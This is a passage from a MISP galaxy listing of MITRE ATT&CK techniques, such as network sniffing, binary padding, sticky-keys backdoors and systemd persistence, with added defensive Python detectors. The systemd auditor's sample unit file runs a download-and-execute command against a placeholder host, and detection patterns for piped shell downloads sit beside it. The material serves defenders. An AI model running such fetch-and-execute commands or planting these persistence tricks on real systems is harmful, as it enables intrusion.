While public references of usage by threat actors are scarce, many red teams/penetration testers leverage hardware additions for initial access. Commercial and open source products can be leveraged with capabilities such as passive network tapping, network traffic modification (i.e. [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557)), keystroke injection, kernel memory reading via DMA, addition of new wireless access to an existing network, and others.(Citation: Ossmann Star Feb 2011)(Citation: Aleks Weapons Nov 2015)(Citation: Frisk DMA August 2016)(Citation: McMillan Pwn March 2012)

The tag is: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200"

Table 6174. Table References

Links

https://arstechnica.com/information-technology/2012/03/the-pwn-plug-is-a-little-white-box-that-can-hack-your-network/

https://attack.mitre.org/techniques/T1200

https://ossmann.blogspot.com/2011/02/throwing-star-lan-tap.html

https://www.youtube.com/watch?v=fXthwl6ShOg

https://www.youtube.com/watch?v=lDvf4ScWbcQ

Data Compressed - T1002

An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network. The compression is done separately from the exfiltration channel and is performed using a custom program or algorithm, or a more common compression library or utility such as 7zip, RAR, ZIP, or zlib.
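The file-signature list linked below is the defender's counterpart to this technique: staged archives are often renamed to hide their type, but the leading bytes still identify the container. The following is an added example, not part of the MISP galaxy or of ATT&CK, that identifies the formats named above (7z, RAR, ZIP, zlib, plus gzip, bzip2 and xz) by magic bytes and flags files whose extension does not match their content. The sample archives are constructed in memory so the script runs offline; the file names used are hypothetical.

```python
import gzip
import io
import zipfile
import zlib

# Fixed magic-byte prefixes, per the file-signature list linked in this entry.
SIGNATURES = [
    (b"7z\xbc\xaf\x27\x1c", "7z"),
    (b"Rar!\x1a\x07\x01\x00", "rar"),   # RAR 5.x
    (b"Rar!\x1a\x07\x00", "rar"),       # RAR 1.5 - 4.x
    (b"PK\x03\x04", "zip"),             # local file header
    (b"PK\x05\x06", "zip"),             # empty archive
    (b"PK\x07\x08", "zip"),             # spanned archive
    (b"\x1f\x8b", "gzip"),
    (b"BZh", "bzip2"),
    (b"\xfd7zXZ\x00", "xz"),
]

# Extensions that legitimately carry compressed content.
ARCHIVE_EXTENSIONS = {"7z", "rar", "zip", "gz", "tgz", "bz2", "xz", "z", "zlib"}


def _is_zlib_stream(data: bytes) -> bool:
    """zlib has no fixed magic. RFC 1950: CMF low nibble is 8 (deflate), CINFO <= 7,
    and the 16-bit value CMF*256 + FLG is a multiple of 31."""
    if len(data) < 2:
        return False
    cmf, flg = data[0], data[1]
    if cmf & 0x0F != 8 or (cmf >> 4) > 7:
        return False
    return ((cmf << 8) | flg) % 31 == 0


def identify_compression(data: bytes):
    """Return the container/stream type implied by the leading bytes, or None."""
    for magic, name in SIGNATURES:
        if data.startswith(magic):
            return name
    if _is_zlib_stream(data):
        return "zlib"
    return None


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the content is compressed but the name does not claim to be an archive."""
    kind = identify_compression(data)
    if kind is None:
        return False
    ext = filename.lower().rsplit(".", 1)[-1] if "." in filename else ""
    return ext not in ARCHIVE_EXTENSIONS


def make_samples() -> dict:
    """Constructed in-memory samples: real archives produced by the standard library."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.docx", b"constructed sample document")
    return {
        "q3-figures.zip": buf.getvalue(),
        "notes.txt": zlib.compress(b"constructed sample text, zlib wrapped"),
        "photo.jpg": gzip.compress(b"constructed sample text, gzip wrapped"),
        "readme.txt": b"plain text, not compressed at all",
    }


def scan(samples: dict) -> list:
    """Return (name, detected_type) for every sample whose extension hides compressed content."""
    return [(name, identify_compression(data))
            for name, data in samples.items()
            if extension_mismatch(name, data)]


if __name__ == "__main__":
    for name, kind in scan(make_samples()):
        print(f"{name}: content is {kind}, extension does not match")
```

The zlib check is the one worth remembering: there is no literal magic string, only the header arithmetic, which is why signature lists often give `78 01`, `78 9C` and `78 DA` as "common" zlib starts rather than a single value.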

The tag is: misp-galaxy:mitre-attack-pattern="Data Compressed - T1002"

Table 6175. Table References

Links

https://attack.mitre.org/techniques/T1002

https://en.wikipedia.org/wiki/List_of_file_signatures

Network Sniffing - T1040

Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use SPAN ports to capture a larger amount of data.

Data captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.

Network sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.

In cloud-based environments, adversaries may still be able to use traffic mirroring services to sniff network traffic from virtual machines. For example, AWS Traffic Mirroring, GCP Packet Mirroring, and Azure vTap allow users to define specified instances to collect traffic from and specified targets to send collected traffic to.(Citation: AWS Traffic Mirroring)(Citation: GCP Packet Mirroring)(Citation: Azure Virtual Network TAP) Often, much of this traffic will be in cleartext due to the use of TLS termination at the load balancer level to reduce the strain of encrypting and decrypting traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)(Citation: SpecterOps AWS Traffic Mirroring) The adversary can then use exfiltration techniques such as Transfer Data to Cloud Account in order to access the sniffed traffic.(Citation: Rhino Security Labs AWS VPC Traffic Mirroring)

On network devices, adversaries may perform network captures using [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as monitor capture.(Citation: US-CERT-TA18-106A)(Citation: capture_embedded_packet_on_software)

The tag is: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040"

Table 6176. Table References

Links

https://attack.mitre.org/techniques/T1040

https://cloud.google.com/vpc/docs/packet-mirroring

https://docs.aws.amazon.com/vpc/latest/mirroring/traffic-mirroring-how-it-works.html

https://docs.microsoft.com/en-us/azure/virtual-network/virtual-network-tap-overview

https://posts.specterops.io/through-the-looking-glass-part-1-f539ae308512

https://rhinosecuritylabs.com/aws/abusing-vpc-traffic-mirroring-in-aws/

https://www.cisco.com/c/en/us/support/docs/ios-nx-os-software/ios-embedded-packet-capture/116045-productconfig-epc-00.html

https://www.us-cert.gov/ncas/alerts/TA18-106A

New Service - T1050

When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service’s configuration information, including the file path to the service’s executable, is stored in the Windows Registry.

Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with [Masquerading](https://attack.mitre.org/techniques/T1036). Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1035).

The tag is: misp-galaxy:mitre-attack-pattern="New Service - T1050"

Table 6177. Table References

Links

https://attack.mitre.org/techniques/T1050

https://capec.mitre.org/data/definitions/550.html

https://docs.microsoft.com/windows/security/threat-protection/auditing/event-4697

https://docs.microsoft.com/windows/security/threat-protection/use-windows-event-forwarding-to-assist-in-intrusion-detection

https://technet.microsoft.com/en-us/library/cc772408.aspx

https://technet.microsoft.com/en-us/sysinternals/bb963902

Weaken Encryption - T1600

Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. (Citation: Cisco Synful Knock Evolution)

Encryption can be used to protect transmitted network traffic to maintain its confidentiality (protect against unauthorized disclosure) and integrity (protect against unauthorized changes). Encryption ciphers are used to convert a plaintext message to ciphertext and can be computationally intensive to decipher without the associated decryption key. Typically, longer keys increase the cost of cryptanalysis, or decryption without the key.

Adversaries can compromise and manipulate devices that perform encryption of network traffic. For example, through behaviors such as [Modify System Image](https://attack.mitre.org/techniques/T1601), [Reduce Key Space](https://attack.mitre.org/techniques/T1600/001), and [Disable Crypto Hardware](https://attack.mitre.org/techniques/T1600/002), an adversary can negatively affect and/or eliminate a device’s ability to securely encrypt network traffic. This poses a greater risk of unauthorized disclosure and may help facilitate data manipulation, Credential Access, or Collection efforts. (Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="Weaken Encryption - T1600"

Table 6178. Table References

Links

https://attack.mitre.org/techniques/T1600

https://blogs.cisco.com/security/evolution-of-attacks-on-cisco-ios-devices

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

Indicator Removal - T1070

Adversaries may delete or modify artifacts generated within systems to remove evidence of their presence or hinder defenses. Various artifacts may be created by an adversary or something that can be attributed to an adversary’s actions. Typically these artifacts are used as defensive indicators related to monitored events, such as strings from downloaded files, logs that are generated from user actions, and other data analyzed by defenders. Location, format, and type of artifact (such as command or login history) are often specific to each platform.

Removal of these indicators may interfere with event collection, reporting, or other processes used to detect intrusion activity. This may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Removal - T1070"

Table 6179. Table References

Links

https://attack.mitre.org/techniques/T1070

Fallback Channels - T1008

Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds.

The tag is: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008"

Table 6180. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1008

Binary Padding - T1009

Adversaries can use binary padding to add junk data and change the on-disk representation of malware without affecting the functionality or behavior of the binary. This will often increase the size of the binary beyond what some security tools are capable of handling due to file size limitations.

Binary padding effectively changes the checksum of the file and can also be used to avoid hash-based blacklists and static anti-virus signatures.(Citation: ESET OceanLotus) The padding used is commonly generated by a function to create junk data and then appended to the end or applied to sections of malware.(Citation: Securelist Malware Tricks April 2017) Increasing the file size may decrease the effectiveness of certain tools and detection capabilities that are not designed or configured to scan large files. This may also reduce the likelihood of being collected for analysis. Public file scanning services, such as VirusTotal, limit the maximum size of an uploaded file to be analyzed.(Citation: VirusTotal FAQ)
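Because appended junk changes the whole-file hash, a defender who only compares full-file hashes loses the match. An added example follows (not code from the MISP galaxy or ATT&CK) that measures the trailing run of identical bytes at the end of a file, strips it when it is long enough to be padding, and computes a normalized SHA-256 that can be compared against known hashes; the sample bytes and the 1024-byte threshold are constructed for illustration.

```python
import hashlib


def trailing_run(data: bytes):
    """Return (byte_value, run_length) for the run of identical bytes ending the file."""
    if not data:
        return None, 0
    last = data[-1]
    n = 1
    while n < len(data) and data[-1 - n] == last:
        n += 1
    return last, n


def strip_padding(data: bytes, min_run: int = 1024) -> bytes:
    """Drop a trailing run of one repeated byte if it is at least min_run bytes long.
    Shorter runs are kept: a few trailing zeros are normal in many file formats."""
    _, n = trailing_run(data)
    if n >= min_run:
        return data[: len(data) - n]
    return data


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def padding_report(data: bytes, min_run: int = 1024) -> dict:
    """Summarise suspected padding and give both the raw and the normalized hash."""
    value, n = trailing_run(data)
    core = strip_padding(data, min_run)
    padding = len(data) - len(core)
    return {
        "size": len(data),
        "padding_byte": value if padding else None,
        "padding_length": padding,
        "padding_ratio": round(padding / len(data), 3) if data else 0.0,
        "sha256": sha256_hex(data),
        "sha256_normalized": sha256_hex(core),
    }


# Constructed sample: a small "program" with 5000 zero bytes appended to it.
ORIGINAL = b"CONSTRUCTED SAMPLE PROGRAM CONTENT"
PADDED = ORIGINAL + b"\x00" * 5000

if __name__ == "__main__":
    for key, val in padding_report(PADDED).items():
        print(f"{key}: {val}")
```

The check only covers the simplest case the entry describes, a single repeated byte appended at the end. Padding made of pseudo-random junk, or junk written into a section rather than the overlay, produces no long run of one byte, and for those the normalized hash is the same as the raw hash; a high padding ratio is then absent and other signals (section entropy, overlay size relative to the headers) are needed.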

The tag is: misp-galaxy:mitre-attack-pattern="Binary Padding - T1009"

Table 6181. Table References

Links

https://attack.mitre.org/techniques/T1009

https://capec.mitre.org/data/definitions/572.html

https://securelist.com/old-malware-tricks-to-bypass-detection-in-the-age-of-big-data/78010/

https://www.virustotal.com/en/faq/

https://www.welivesecurity.com/2018/03/13/oceanlotus-ships-new-backdoor/

Brute Force - T1110

Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes.

Brute forcing credentials may take place at various points during a breach. For example, adversaries may attempt to brute force access to [Valid Accounts](https://attack.mitre.org/techniques/T1078) within a victim environment leveraging knowledge gathered from other post-compromise behaviors such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), [Account Discovery](https://attack.mitre.org/techniques/T1087), or [Password Policy Discovery](https://attack.mitre.org/techniques/T1201). Adversaries may also combine brute forcing activity with behaviors such as [External Remote Services](https://attack.mitre.org/techniques/T1133) as part of Initial Access.

The tag is: misp-galaxy:mitre-attack-pattern="Brute Force - T1110"

Table 6182. Table References

Links

https://attack.mitre.org/techniques/T1110

Query Registry - T1012

Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.

The Registry contains a significant amount of information about the operating system, configuration, software, and security.(Citation: Wikipedia Windows Registry) Information can easily be queried using the [Reg](https://attack.mitre.org/software/S0075) utility, though other means to access the Registry exist. Some of the information may help adversaries to further their operation within a network. Adversaries may use the information from [Query Registry](https://attack.mitre.org/techniques/T1012) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

The tag is: misp-galaxy:mitre-attack-pattern="Query Registry - T1012"

Table 6183. Table References

Links

https://attack.mitre.org/techniques/T1012

https://en.wikipedia.org/wiki/Windows_Registry

Remote Services - T1021

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.

In an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to log in using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could log in to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also log in to accessible SaaS or IaaS services, such as those that federate their identities to the domain.

Legitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Services - T1021"

Table 6184. Table References

Links

http://lockboxx.blogspot.com/2019/07/macos-red-teaming-206-ard-apple-remote.html

https://attack.mitre.org/techniques/T1021

https://images.apple.com/remotedesktop/pdf/ARD_Admin_Guide_v3.3.pdf

https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins

https://support.apple.com/en-us/HT201710

https://support.apple.com/en-us/HT209161

https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx

https://www.fireeye.com/blog/threat-research/2019/10/leveraging-apple-remote-desktop-for-good-and-evil.html

https://www.ssh.com/ssh

Web Service - T1102

Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.

Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).

The tag is: misp-galaxy:mitre-attack-pattern="Web Service - T1102"

Table 6185. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1102

AppInit DLLs - T1103

Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys <code>HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows</code> or <code>HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows</code> are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017) Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values can be abused to obtain persistence and privilege escalation by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry)

The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)

The tag is: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103"

Table 6186. Table References

Links

https://attack.mitre.org/techniques/T1103

https://msdn.microsoft.com/en-us/library/dn280412

https://support.microsoft.com/en-us/kb/197571

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

Port Monitors - T1013

A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in <code>C:\Windows\System32</code> and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to <code>HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.

The Registry key contains entries for the following:

  • Local Port

  • Standard TCP/IP Port

  • USB Monitor

  • WSD Port

Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.

The tag is: misp-galaxy:mitre-attack-pattern="Port Monitors - T1013"

Table 6187. Table References

Links

http://msdn.microsoft.com/en-us/library/dd183341

https://attack.mitre.org/techniques/T1013

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf

Accessibility Features - T1015

Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are <code>C:\Windows\System32\sethc.exe</code>, launched when the shift key is pressed five times and <code>C:\Windows\System32\utilman.exe</code>, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)

Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in <code>%systemdir%\</code>, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:

For simple binary replacement on Windows XP and later as well as Windows Server 2003/R2 and later, for example, the program (e.g., <code>C:\Windows\System32\utilman.exe</code>) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)

Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)

  • On-Screen Keyboard: <code>C:\Windows\System32\osk.exe</code>

  • Magnifier: <code>C:\Windows\System32\Magnify.exe</code>

  • Narrator: <code>C:\Windows\System32\Narrator.exe</code>

  • Display Switcher: <code>C:\Windows\System32\DisplaySwitch.exe</code>

  • App Switcher: <code>C:\Windows\System32\AtBroker.exe</code>

The tag is: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1015"

Table 6188. Table References

Links

http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/

https://attack.mitre.org/techniques/T1015

https://capec.mitre.org/data/definitions/558.html

https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html

https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom

Clipboard Modification - T1510

Adversaries may abuse clipboard functionality to intercept and replace information in the Android device clipboard.(Citation: ESET Clipboard Modification February 2019)(Citation: Welivesecurity Clipboard Modification February 2019)(Citation: Syracuse Clipboard Modification 2014) Malicious applications may monitor the clipboard activity through the <code>ClipboardManager.OnPrimaryClipChangedListener</code> interface on Android to determine when the clipboard contents have changed.(Citation: Dr.Webb Clipboard Modification origin2 August 2018)(Citation: Dr.Webb Clipboard Modification origin August 2018) Listening to clipboard activity, reading the clipboard contents, and modifying the clipboard contents require no explicit application permissions and can be performed by applications running in the background; however, this behavior has changed with the release of Android 10.(Citation: Android 10 Privacy Changes)

Adversaries may use [Clipboard Modification](https://attack.mitre.org/techniques/T1510) to replace text prior to being pasted, for example, replacing a copied Bitcoin wallet address with a wallet address that is under adversarial control.

[Clipboard Modification](https://attack.mitre.org/techniques/T1510) has been seen within the Android/Clipper.C trojan. This sample was detected by ESET in an application distributed through the Google Play Store targeting cryptocurrency wallet numbers.(Citation: ESET Clipboard Modification February 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Clipboard Modification - T1510"

Table 6189. Table References

Links

http://www.cis.syr.edu/wedu/Research/paper/clipboard_attack_dimva2014.pdf

https://attack.mitre.org/techniques/T1510

https://developer.android.com/about/versions/10/privacy/changes#clipboard-data

https://vms.drweb.com/virus/?i=17517750

https://vms.drweb.com/virus/?i=17517761

https://www.eset.com/uk/about/newsroom/press-releases/first-clipper-malware-discovered-on-google-play-1/

https://www.welivesecurity.com/2019/02/08/first-clipper-malware-google-play/

Plist Modification - T1150

Property list (plist) files contain all of the information that macOS and OS X use to configure applications and services. These files are UTF-8 encoded and formatted like XML documents via a series of keys surrounded by < >. They detail when programs should execute, file paths to the executables, program arguments, required OS permissions, and many others. plists are located in certain locations depending on their purpose such as <code>/Library/Preferences</code> (which execute with elevated privileges) and <code>~/Library/Preferences</code> (which execute with a user’s privileges). Adversaries can modify these plist files to point to their own code, can use them to execute their code in the context of another user, bypass whitelisting procedures, or even use them as a persistence mechanism. (Citation: Sofacy Komplex Trojan)

The tag is: misp-galaxy:mitre-attack-pattern="Plist Modification - T1150"

Table 6190. Table References

Links

https://attack.mitre.org/techniques/T1150

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

Systemd Service - T1501

Systemd services can be used to establish persistence on a Linux system. The systemd service manager is commonly used for managing background daemon processes (also known as services) and other system resources.(Citation: Linux man-pages: systemd January 2014)(Citation: Freedesktop.org Linux systemd 29SEP2018) Systemd is the default initialization (init) system on many Linux distributions starting with Debian 8, Ubuntu 15.04, CentOS 7, RHEL 7, Fedora 15, and replaces legacy init systems including SysVinit and Upstart while remaining backwards compatible with the aforementioned init systems.

Systemd utilizes configuration files known as service units to control how services boot and under what conditions. By default, these unit files are stored in the <code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> directories and have the file extension <code>.service</code>. Each service unit file may contain numerous directives that can execute system commands.

  • ExecStart, ExecStartPre, and ExecStartPost directives cover execution of commands when a service is started manually by 'systemctl' or on system start if the service is set to automatically start.

  • ExecReload directive covers when a service restarts.

  • ExecStop and ExecStopPost directives cover when a service is stopped, including when it is stopped manually by 'systemctl'.

Adversaries have used systemd functionality to establish persistent access to victim systems by creating and/or modifying service unit files that cause systemd to execute malicious commands at recurring intervals, such as at system boot.(Citation: Anomali Rocke March 2019)(Citation: gist Arch package compromise 10JUL2018)(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)

While adversaries typically require root privileges to create/modify service unit files in the <code>/etc/systemd/system</code> and <code>/usr/lib/systemd/system</code> directories, low privilege users can create/modify service unit files in directories such as <code>~/.config/systemd/user/</code> to achieve user-level persistence.(Citation: Rapid7 Service Persistence 22JUNE2016)
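The directives listed above, together with the system and user-level unit directories, are what a defender audits when hunting for this technique. The following is an added example (not part of the MISP galaxy or ATT&CK, and not a systemd tool) that parses a unit file's <code>[Service]</code> section for every <code>Exec*</code> directive and flags commands whose executable lives in a world-writable or home directory, or that pipe a download into a shell or decode a base64 payload. The two unit files, the paths and the indicator list are constructed for illustration; the host name <code>example.invalid</code> is a reserved placeholder.

```python
import re

EXEC_DIRECTIVES = ("ExecStartPre", "ExecStart", "ExecStartPost",
                   "ExecReload", "ExecStop", "ExecStopPost")

# Locations a service executable would not normally live in (constructed list).
UNUSUAL_EXEC_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/")

# Unit directories low-privilege users can write to without root.
USER_UNIT_DIR_MARKER = "/.config/systemd/user/"


def parse_exec_directives(unit_text: str) -> list:
    """Return (directive, command) pairs from the [Service] section, preserving order
    and duplicates (systemd allows several ExecStartPre= lines)."""
    section = None
    found = []
    for raw in unit_text.splitlines():
        line = raw.strip()
        if not line or line.startswith(("#", ";")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
            continue
        if section != "Service" or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        if key in EXEC_DIRECTIVES:
            found.append((key, value))
    return found


def _executable(command: str) -> str:
    # Drop systemd's special prefix characters ("-", "@", "+", "!") before the path.
    cmd = command.lstrip("-@+!").strip()
    return cmd.split()[0] if cmd else ""


def suspicious_indicators(command: str) -> list:
    """Heuristic findings for one Exec* command line."""
    findings = []
    exe = _executable(command)
    if exe.startswith(UNUSUAL_EXEC_DIRS):
        findings.append(f"executable in unusual directory: {exe}")
    if re.search(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", command):
        findings.append("download piped directly to a shell")
    if re.search(r"\bbase64\s+(-d|--decode)\b", command):
        findings.append("base64-decoded payload in command line")
    return findings


def audit_unit(path: str, unit_text: str) -> dict:
    """Audit one unit file: where it lives and which Exec* lines look suspicious."""
    findings = []
    for directive, command in parse_exec_directives(unit_text):
        for reason in suspicious_indicators(command):
            findings.append((directive, command, reason))
    return {
        "path": path,
        "user_level": USER_UNIT_DIR_MARKER in path,
        "findings": findings,
    }


# Constructed sample units (not taken from any real incident).
BENIGN_UNIT = """\
[Unit]
Description=OpenSSH server daemon

[Service]
Type=notify
ExecStart=/usr/sbin/sshd -D
ExecReload=/bin/kill -HUP $MAINPID

[Install]
WantedBy=multi-user.target
"""

SUSPICIOUS_UNIT = """\
[Unit]
Description=System update helper

[Service]
Type=simple
ExecStartPre=-/tmp/.x/update
ExecStart=/bin/sh -c "curl http://example.invalid/p.sh | sh"
Restart=always

[Install]
WantedBy=default.target
"""

if __name__ == "__main__":
    for path, text in (("/usr/lib/systemd/system/sshd.service", BENIGN_UNIT),
                       ("/home/alice/.config/systemd/user/update.service", SUSPICIOUS_UNIT)):
        report = audit_unit(path, text)
        print(path, "user-level" if report["user_level"] else "system-level")
        for directive, command, reason in report["findings"]:
            print(f"  {directive}: {reason}")
```

In practice the audit is run over every file in the three directories named in this entry plus each user's <code>~/.config/systemd/user/</code>, and the result is compared with a known-good baseline; the heuristics above only surface candidates for a human to look at.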

The tag is: misp-galaxy:mitre-attack-pattern="Systemd Service - T1501"

Table 6191. Table References

Links

http://man7.org/linux/man-pages/man1/systemd.1.html

https://attack.mitre.org/techniques/T1501

https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a

https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html

https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang

https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/

https://www.freedesktop.org/wiki/Software/systemd/

https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence

Shared Webroot - T1051

This technique has been deprecated and should no longer be used.

Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website’s webroot or Web content directory (Citation: Microsoft Web Root OCT 2016) (Citation: Apache Server 2018) and then browse to that content with a Web browser to cause the server to execute the malicious content. The malicious content will typically run under the context and permissions of the Web server process, often resulting in local system or administrative privileges, depending on how the Web server is configured.

This mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited. (Citation: Webroot PHP 2011)

The tag is: misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051"

Table 6192. Table References

Links

http://httpd.apache.org/docs/2.4/getting-started.html#content

https://attack.mitre.org/techniques/T1051

https://capec.mitre.org/data/definitions/563.html

https://www.webroot.com/blog/2011/02/22/malicious-php-scripts-on-the-rise/

Native API - T1106

